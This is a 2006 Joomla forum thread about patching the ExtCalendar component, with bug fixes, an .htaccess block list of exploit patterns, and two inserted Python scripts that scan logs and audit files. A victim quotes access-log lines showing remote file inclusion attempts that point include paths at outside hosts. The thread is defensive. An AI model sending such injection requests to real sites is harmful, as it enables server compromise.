[UPGRADE AVAIL.] ExtCalendar Vulnerability

TCwho
Joomla! Apprentice
Posts: 13
Joined: Fri Sep 09, 2005 8:37 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by TCwho » Sun Aug 13, 2006 1:54 pm

Just want to say a Big

Thank You

I have Joomla version 1.0.6 with extCal version 0.9.1 installed, and without any changes on our part we got the following error message:

Fatal error: main(): Failed opening required '' (include_path='.:/usr/local/lib/php') in /homepages/34/d113888460/htdocs/ssdc2/administrator/components/com_extcalendar/admin.extcalendar.php on line 13


After applying the uninstall and reinstalling with the 0.9.2 version, the calendar was back up.... Hmmm, I always liked this calendar since back in the Mambo days... now I gotta do some more reading to find some other calendar alternatives... but if it was like the Mambo days... extCalendar was the top choice! And from the looks of it... I'm not the only one who still prefers it

:)

Thanks again.

technopuzzle
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro

Post by technopuzzle » Sun Aug 13, 2006 7:43 pm

With all the security issues going around, you may also want to upgrade to Joomla 1.0.10.
TCwho wrote: Just want to say a Big

Thank You

I have Joomla version 1.0.6 with extCal version 0.9.1 installed, and without any changes on our part we got the following error message:

Fatal error: main(): Failed opening required '' (include_path='.:/usr/local/lib/php') in /homepages/34/d113888460/htdocs/ssdc2/administrator/components/com_extcalendar/admin.extcalendar.php on line 13


After applying the uninstall and reinstalling with the 0.9.2 version, the calendar was back up.... Hmmm, I always liked this calendar since back in the Mambo days... now I gotta do some more reading to find some other calendar alternatives... but if it was like the Mambo days... extCalendar was the top choice! And from the looks of it... I'm not the only one who still prefers it

:)

Thanks again.
Thanks,
Roger Raymond
Techno Puzzle

theflyingdutchman
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant

Post by theflyingdutchman » Sun Aug 20, 2006 7:03 pm

LeonZ wrote: Thanks for the hard work.  :D
Little problem, the Dutch language file included doesn't work at all. Attached a working version for Dutch.
After uploading the Dutch zip I get the following error

Fatal error: Cannot redeclare translate_deprecated() (previously declared in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php:439) in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php on line 439

Do you have any idea?

cheers
Peter
You have to believe in something after all; I believe I'll grab another beer.

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Mon Aug 21, 2006 11:34 am

Peter,

This means the variable translate_deprecated has been declared more than once. You can comment out line 439 in components/com_extcalendar/languages/dutch/index.php.

greetings
Fonny

theflyingdutchman
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant

Post by theflyingdutchman » Mon Aug 21, 2006 12:38 pm

fonny wrote: Peter,

This means the variable translate_deprecated has been declared more than once. You can comment out line 439 in components/com_extcalendar/languages/dutch/index.php.

greetings
Fonny
Hi Fonny

You mean just delete it?

cheers
You have to believe in something after all; I believe I'll grab another beer.

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Mon Aug 21, 2006 4:13 pm

Peter,
Delete or comment. You choose.

gr

theflyingdutchman
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant

Post by theflyingdutchman » Mon Aug 21, 2006 6:46 pm

fonny wrote: Peter,
Delete or comment. You choose.

gr
Parse error: syntax error, unexpected '}' in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php on line 607

is the next error :(
Does that mean I need to comment out the complete part between line 439 and 607?

Prob already been fixed.
Just had 1 character too much commented out.
Working now.

thx again
Last edited by theflyingdutchman on Mon Aug 21, 2006 6:54 pm, edited 1 time in total.
You have to believe in something after all; I believe I'll grab another beer.

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Mon Aug 21, 2006 7:31 pm

Peter,

I just checked the language file and can only find one declaration of translate_deprecated. To comment out just change line 439 from
function translate_DEPRECATED($word){
to
//function translate_DEPRECATED($word){

But I don't think this is the problem. Did you get your version from DutchJoomla? This is NOT the latest and safe version. Please read this thread http://forum.joomla.org/index.php/topic ... #msg402249
and get this version (dutch language is included).

Fonny

RasCas
Joomla! Apprentice
Posts: 10
Joined: Fri Jun 02, 2006 9:59 am

Post by RasCas » Mon Aug 21, 2006 7:53 pm

Ok, and now something completely different  8)
A bug concerning the monthly view has survived. If there is more than one event on a day in the monthly view, all events show the same text.
Fix: in extcalendar.php move line 531 into the while loop

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Mon Aug 21, 2006 8:02 pm

Can we keep on topic and move those questions to the extcalendar tracker ?
This is about the security issues of extcalendar.

Fonny

ahwoogamac
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA

Post by ahwoogamac » Tue Aug 22, 2006 1:46 pm

I have a couple questions.

1) Were the Theme files changed in the security release?  I have spent some considerable time tweaking the theme files (and unfortunately a little of the extcalendar.php file - so it will be overwritten) to actually make the calendar XHTML and CSS valid.  If the theme files haven't been changed, I'll remove them from the .zip file before I try any upgrades.

2) Now that ExtCalendar is "resurrected," will it be included again in the Extensions list?
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Post by davidrrm » Wed Aug 23, 2006 3:37 am

default/themes.php was changed, but just a bit, so you'd want to just make the changes to themes.php by hand (make sure you backup your modified themes.php before doing the removal or installation).

This is the key line -

Code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
which should be added about line 18 (before any other code).

There were a few other bug fixes (which you may have already made). The patch from the previous release to the security release is attached.

Yes, it will get back in the extensions directory soon. We've been working on getting the JoomlaForge project setup and I haven't had a chance to add it back to the list.

david

ahwoogamac
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA

Post by ahwoogamac » Wed Aug 23, 2006 3:34 pm

Great.  I already did that after the necromancer hacking scare.  So I should be good to go.  There was also a bug in the tables around the search area, where they aren't inserted correctly by the PHP and the code messes up.  While I would think working to a tableless template would be ideal, inserting an extra couple of tags into the theme will correct the problem.  Just FYI.
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

sohoportal
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Post by sohoportal » Wed Aug 30, 2006 6:16 am

ahwoogamac wrote: Great.  I already did that after the necromancer hacking scare.  So I should be good to go.  There was also a bug in the tables around the search area, where they aren't inserted correctly by the PHP and the code messes up.  While I would think working to a tableless template would be ideal, inserting an extra couple of tags into the theme will correct the problem.  Just FYI.
After spending the past 1.5 hours scouring this site and the Internet in general, I can't seem to find any detailed references which indicate how to deal with the bottom search bar in Ext Calendar re-directing users to the home page. I apologize if this has been posted and I've overlooked it. I would greatly appreciate any help or assistance that can be provided in addressing/correcting this problem.

If this fix is included in the most recent vulnerability fix, I'd appreciate knowing that as well (and thanks very much to the folks that made the vulnerability fix a reality).

ahwoogamac
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA

Post by ahwoogamac » Wed Aug 30, 2006 1:10 pm

After speaking to some that are working on the project, we discussed the search issue.  Along with a BUNCH of other cool stuff, it sounds like they'll be addressing that issue upon the next release.  There was a temporary fix posted in the comment area of the ExtCalendar extension area, but since they removed it as an extension for now, it's no longer available.  I just removed the whole search option altogether on mine until the fix comes out.  Just go to your settings in the backend admin area and change Enable Search to "no."
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

sohoportal
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Post by sohoportal » Wed Aug 30, 2006 2:20 pm

ahwoogamac wrote: After speaking to some that are working on the project, we discussed the search issue.  Along with a BUNCH of other cool stuff, it sounds like they'll be addressing that issue upon the next release.  There was a temporary fix posted in the comment area of the ExtCalendar extension area, but since they removed it as an extension for now, it's no longer available.  I just removed the whole search option altogether on mine until the fix comes out.  Just go to your settings in the backend admin area and change Enable Search to "no."
Thanks very much for your prompt reply. I have done as suggested and eagerly await the next fix.

na3
Joomla! Apprentice
Posts: 18
Joined: Mon Jul 17, 2006 3:57 am

Post by na3 » Sun Sep 10, 2006 8:35 am

Just wanted to say thanks for the security release. After upgrading my site and using the Events component found on Mamboforge, I found that Events broke. I decided to drop Events and use ExtCal instead - only to find these security problems! So glad Joomla people are willing to muck in on 3rd party stuff, since the ExtCal developer seems to be doing nothing.

:-* 

ddmobley
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Post by ddmobley » Thu Sep 21, 2006 3:10 am

sohoportal wrote: After spending the past 1.5 hours scouring this site and the Internet in general, I can't seem to find any detailed references which indicate how to deal with the bottom search bar in Ext Calendar re-directing users to the home page. I apologize if this has been posted and I've overlooked it. I would greatly appreciate any help or assistance that can be provided in addressing/correcting this problem.
In the file "/components/com_extcalendar/themes/default/theme.php" search for the following code:

Code:

// HTML template for the search form
$template_search_form = <<<EOT
	<form action="{FORM_ACTION}" method="post">
<!-- BEGIN message_row -->
Replace that block of code with this:

Code:

// HTML template for the search form
$sef_href = sefRelToAbs( $CONFIG_EXT['calendar_calling_page']);
$template_search_form = <<<EOT
	<form action="{$sef_href}" method="post">
<!-- BEGIN message_row -->
Save file, and enjoy.

Darrell
http://www.rocketryplanet.com

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Thu Sep 21, 2006 8:10 am

Darrell,

I would rather advise catching the error at the root. The problem is that $CONFIG_EXT is not declared global in function theme_search_form()

Change line 1527 in function theme_search_form($keyword, $button) to

    global $template_search_form, $lang_event_search_data, $CONFIG_EXT;

No need to change anything further.

greetings
fonny

Ottobufonto
Joomla! Enthusiast
Posts: 118
Joined: Tue Sep 06, 2005 10:53 pm

Post by Ottobufonto » Thu Sep 21, 2006 8:45 am

Hmm,
but Darrell is looking at $template_search_form which is used by function theme_search_results().

To fix the root problem for FORM_ACTION in  $template_search_form you need to add the variable to the correct array in the calling function.

Code:

$params = array(
    '{KEY_VAL}' => $keyword,
    '{KEY_DESC}' => $lang_event_search_data['search_caption'],
    '{SUBMIT}' => $button,
    '{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page'] ) // <----- add this line.
);
echo template_eval($search_row, $params);
Btw: Not that this has anything to do with the topic - the Security Release!

fonny
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Post by fonny » Thu Sep 21, 2006 9:17 am

Ottobufonto,

Sorry, I didn't know this line was missing in the original file. I must have already patched it 'incorrectly' in the past.

You're right, this has nothing to do with the original topic.

sohoportal
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Post by sohoportal » Thu Sep 21, 2006 11:41 am

Ottobufonto wrote: Hmm,
but Darrell is looking at $template_search_form which is used by function theme_search_results().

To fix the root problem for FORM_ACTION in  $template_search_form you need to add the variable to the correct array in the calling function.

Code:

$params = array(
    '{KEY_VAL}' => $keyword,
    '{KEY_DESC}' => $lang_event_search_data['search_caption'],
    '{SUBMIT}' => $button,
    '{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page'] ) // <----- add this line.
);
echo template_eval($search_row, $params);
Btw: Not that this has anything to do with the topic - the Security Release!
Thanks very much Darrell, Ottobufonto & Fonny.

Garry
Last edited by sohoportal on Thu Sep 21, 2006 11:52 am, edited 1 time in total.

ddmobley
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Post by ddmobley » Thu Sep 21, 2006 5:20 pm

There is also a problem with the Edit button on popped-up events not having the Itemid on it.  I fixed mine by adding some code to the $non_sef_href:

Code:

$non_sef_href = $CONFIG_EXT['calendar_url']."cal_popup.php?extmode=view&extid=".$event->extid.($event->isRecurrent()?"&recurdate=".$event->recurStartDay:'');
Add Itemid=".$CONFIG_EXT['Itemid']."& to look like:

Code:

$non_sef_href = $CONFIG_EXT['calendar_url']."cal_popup.php?Itemid=".$CONFIG_EXT['Itemid']."&extmode=view&extid=".$event->extid.($event->isRecurrent()?"&recurdate=".$event->recurStartDay:'');
This is in several places.  Just search for "MM_openBrWindow" and you will find it.

pdstein
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Post by pdstein » Mon Sep 25, 2006 5:35 pm

Have any new vulnerabilities been found in extCal v2 (0.9.2)?  I upgraded extCalendar on July 20 and thought it was secure.  The company that manages my server says that malicious scripts were uploaded onto the server and cited about 40 entries in the logs that look like this

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://mirckurdu.net/sanalofis/lol.txt? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"

plus one like this:

campersforchrist.com:147.202.47.31 - - [25/Sep/2006:07:05:24 -0400] "GET /cms/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nioku.myinfo.ws/cmd.do?? HTTP/1.1" 200 58 "-" "libwww-perl/5.805"

Is there a way to confirm whether this was definitely the way the malicious scripts were uploaded?  Is there a security hole in extCal 0.9.2?  Or could it be something else?  Any help would be greatly appreciated.

- Paul

ddmobley
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Post by ddmobley » Mon Sep 25, 2006 6:04 pm

pdstein wrote: Have any new vulnerabilities been found in extCal v2 (0.9.2)?  I upgraded extCalendar on July 20 and thought it was secure.
I think you can pretty much say that if you have not updated the software YOURSELF to include the code to check for being run in standalone mode, or you have not modified your .htaccess file to block the exploits, your calendar software is STILL VULNERABLE.

You need to do two things:

In ALL PHP files in the /components/com_extcalendar directory except cal_popup.php, add this line to the beginning of the file right after the comments and version information:

Code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Then, at the end of your .htaccess file, add:

Code:

########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# 
########## End - Rewrite rules to block out some common exploits
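As an added illustration (not code from this thread or from the ExtCalendar project), the Python below applies the five RewriteCond patterns from the .htaccess block above to the query strings of access-log lines in the same vhost-prefixed format pdstein posted, and reports which requests the rules would have refused. It also carries one extra heuristic that is not in the rules, flagging any parameter whose value is itself a URL, because a request of the CONFIG_EXT[ADMIN_PATH]=http://... shape seen in pdstein's log matches none of the five conditions. The log lines, host names, addresses and file names are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Access-log line in the vhost-prefixed combined format used in the thread:
#   vhost:client_ip - - [timestamp] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The five RewriteCond patterns from the .htaccess block, as Python regexes.
# Apache tests them against the raw, still percent-encoded QUERY_STRING; only
# the <script> condition carries [NC], so only that one is case-insensitive.
RULES = [
    ("mosConfig", re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)")),
    ("base64_encode", re.compile(r"base64_encode.*\(.*\)")),
    ("script_tag", re.compile(r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE)),
    ("GLOBALS", re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})")),
    ("_REQUEST", re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})")),
]


def matched_rules(query):
    """Names of the conditions the raw query string would trip (empty = request passes)."""
    return [name for name, rx in RULES if rx.search(query)]


def has_remote_url(query):
    """Added heuristic, not part of the thread's rules: any parameter whose value
    is itself a URL, which is what a remote-include attempt looks like regardless
    of the parameter name (mosConfig_absolute_path, CONFIG_EXT[ADMIN_PATH], ...)."""
    for _, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(("http://", "https://", "ftp://")):
            return True
    return False


def scan(lines):
    """Parse log lines and report, per request, which rules fire and whether the
    rewrite block would have answered 403 for it."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not in the expected format; skip rather than guess
        target = urlsplit(m.group("target"))
        rules = matched_rules(target.query)
        findings.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "path": target.path,
            "query": target.query,
            "rules": rules,
            "blocked": bool(rules),
            "remote_url": has_remote_url(target.query),
        })
    return findings


# Constructed sample log (hosts, addresses and file names are made up).
SAMPLE_LOG = [
    # remote-include attempt via mosConfig_absolute_path: the first condition fires
    'example.org:192.0.2.10 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://198.51.100.7/injected.txt? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"',
    # same idea against admin_settings.php via CONFIG_EXT[ADMIN_PATH]: none of the five conditions match
    'example.org:192.0.2.11 - - [25/Sep/2006:07:05:24 -0400] "GET /cms/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://198.51.100.7/injected.txt? HTTP/1.1" 200 58 "-" "libwww-perl/5.805"',
    # ordinary calendar page view
    'example.org:192.0.2.12 - - [25/Sep/2006:09:12:01 -0400] "GET /cms/index.php?option=com_extcalendar&Itemid=42 HTTP/1.1" 200 14321 "-" "Mozilla/5.0"',
    # percent-encoded script tag in the search keyword: caught by the [NC] condition
    'example.org:192.0.2.13 - - [25/Sep/2006:09:15:44 -0400] "GET /cms/index.php?option=com_extcalendar&keyword=%3cSCRIPT%3ealert(1)%3c/script%3e HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        verdict = "403" if f["blocked"] else "pass"
        flag = " remote-url" if f["remote_url"] else ""
        print(f'{verdict:4s} {f["ip"]:12s} {f["path"]} rules={f["rules"]}{flag}')
```

Two things worth keeping in mind when reading the output: the conditions only take effect when mod_rewrite is enabled and a `RewriteEngine On` line precedes them in the .htaccess (the standard Joomla 1.0 htaccess.txt already has one, which is the kind of host-side setting ssherlock mentions), and they are a filter in front of the code rather than a patch to it, so a request that matches none of them, such as the second sample line, still reaches the script and the per-file `_VALID_MOS` guard is what has to stop it.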

ddmobley
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Post by ddmobley » Mon Sep 25, 2006 6:11 pm

sohoportal wrote: Thanks very much Darrell, Ottobufonto & Fonny.
Actually, Ottobufonto and Fonny were both right.  The modification I did broke the admin side when you went to change/edit the setting in the Administrator.  Just make sure your function theme_search_form looks like this:

Code:

function theme_search_form($keyword, $button)
{
    global $template_search_form, $lang_event_search_data, $CONFIG_EXT; // <-- added $CONFIG_EXT

    starttable('100%', $lang_event_search_data['section_title'], 1);
    $params = array(
        '{KEY_VAL}' => $keyword,
        '{KEY_DESC}' => $lang_event_search_data['search_caption'],
        '{SUBMIT}' => $button,
        '{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page'] ) // <-- Added this line
    );
    echo template_eval($template_search_form, $params);
    endtable();
}

ssherlock
Joomla! Apprentice
Posts: 29
Joined: Wed Oct 05, 2005 9:29 pm

Post by ssherlock » Mon Sep 25, 2006 6:14 pm

ddmobley wrote: Then, at the end of your .htaccess file, add:

Code:

########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# 
########## End - Rewrite rules to block out some common exploits
I would also get your hosting company to check that what has been added to .htaccess is OK.  My host had to enable something on their side to make it work correctly.  Sorry, but I don't remember what the changes were.
Last edited by ssherlock on Mon Sep 25, 2006 6:15 pm, edited 1 time in total.

pdstein
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Post by pdstein » Mon Sep 25, 2006 6:29 pm

ddmobley wrote: In ALL PHP files in the /components/com_extcalendar directory except cal_popup.php, add this line to the beginning of the file right after the comments and version information:

Code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
This was already in components/com_extcalendar/extcalendar.php and administrator/components/com_extcalendar/admin_settings.php
Then, at the end of your .htaccess file, add:
Is not having that code in a .htaccess file a genuine security vulnerability, or are you just saying it's a good idea to have it because it might prevent some security vulnerability someone discovers in the future?  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerability then I need to keep looking.

ddmobley
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Post by ddmobley » Mon Sep 25, 2006 7:03 pm

pdstein wrote:

Code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
This was already in components/com_extcalendar/extcalendar.php and administrator/components/com_extcalendar/admin_settings.php
But is it in EVERY PHP file in that directory except the calendar popup file?  That is the only way to prevent those files from being run standalone.
pdstein wrote: Is not having that code in a .htaccess file a genuine security vulnerability, or are you just saying it's a good idea to have it because it might prevent some security vulnerability someone discovers in the future?  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerability then I need to keep looking.
The contents of that htaccess file are designed to block attempts that exploit the "mosConfig_absolute_path" method.  You had one of those in your log file:

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://********/? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"

Mod Edit: Please do not post links to cracker tools. -RobS
Last edited by RobS on Mon Sep 25, 2006 11:07 pm, edited 1 time in total.
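One way to answer the "is it in EVERY PHP file?" question mechanically, as an added example rather than anything from this thread or the ExtCalendar project: the Python below walks a component directory, skips cal_popup.php as ddmobley says, and reports every .php file where the _VALID_MOS guard is absent, or where an include/require runs before it (the guard only helps if it comes before any other code, as davidrrm noted for themes.php). The sample tree it audits is constructed inline; the file names echo paths mentioned in the thread, but the contents are made up.

```python
import os
import re
import tempfile

# The guard line the thread says belongs at the top of every component file.
GUARD_RE = re.compile(r"""defined\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*or\s*die\b""")
# Statements that pull in other code; none of these may run before the guard.
INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\b")


def strip_comments(src):
    """Drop PHP comments so a commented-out guard (or include) is not counted.
    Deliberately simple: it does not understand strings, which is fine for this check."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"(?m)(//|#).*$", "", src)


def guard_status(src):
    """'ok' when the guard precedes every include/require, 'late' when an
    include runs first, 'missing' when there is no guard at all."""
    code = strip_comments(src)
    guard = GUARD_RE.search(code)
    if guard is None:
        return "missing"
    first_include = INCLUDE_RE.search(code)
    if first_include is not None and first_include.start() < guard.start():
        return "late"
    return "ok"


def audit_component(root, exclude=("cal_popup.php",)):
    """Map each unguarded or late-guarded .php file under root (relative path) to its status."""
    problems = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php") or name in exclude:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                status = guard_status(fh.read())
            if status != "ok":
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                problems[rel] = status
    return dict(sorted(problems.items()))


# Constructed sample tree (hypothetical contents; only the file names echo the thread).
SAMPLE_TREE = {
    "extcalendar.php": (
        "<?php\n/* ExtCalendar entry point (constructed sample) */\n"
        "defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );\n"
        "require_once('functions.php');\n"
    ),
    "functions.php": "<?php\n// helper file with no guard at all\nfunction cal_helper() { return 1; }\n",
    "cal_popup.php": "<?php\n// opened directly by the browser, so it is excluded from the audit\necho 'popup';\n",
    "languages/english/index.php": (
        "<?php\ninclude('common.php');\n"
        "defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');\n"
    ),
    "themes/default/theme.php": (
        "<?php\n// defined( '_VALID_MOS' ) or die( 'x' );   <- commented out, so it does not count\n"
        "$template = 'x';\n"
    ),
    "style.css": "body { margin: 0 }\n",
}


def demo():
    """Write the sample tree to a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_TREE.items():
            path = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_component(tmp)


if __name__ == "__main__":
    for rel, status in demo().items():
        print(f"{status:8s} {rel}")
```

Run it against a real install by calling audit_component() on the component directory instead of demo(); an empty result means every file except the excluded popup has the guard in the right place, which is the condition ddmobley describes.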

pdstein
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Post by pdstein » Mon Sep 25, 2006 7:28 pm

ddmobley wrote: But is it in EVERY PHP file in that directory except the calendar popup file?  That is the only way to prevent those files from being run standalone.
Yes, it is.
pdstein wrote: Is not having that code in a .htaccess file a genuine security vulnerability, or are you just saying it's a good idea to have it because it might prevent some security vulnerability someone discovers in the future?  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerability then I need to keep looking.
The contents of that htaccess file are designed to block attempts that exploit the "mosConfig_absolute_path" method.  You had one of those in your log file:

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://**********? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"

Mod Note: Please do not post links to cracker tools. -RobS

I will go ahead and follow your suggestion and add that code to the .htaccess file.  What I would like to know though is if extCalendar is actually vulnerable without it, or if this is just a precautionary measure.  If there is a real security vulnerability then there should be a change/patch to the PHP code, not just some .htaccess code.  Again, I don't mind adding the .htaccess code just to be safe, but if there isn't any known way someone could have exploited extcalendar without the .htaccess code, then I need to know that so I can keep looking for the security vulnerability that was exploited.
Last edited by RobS on Mon Sep 25, 2006 11:08 pm, edited 1 time in total.

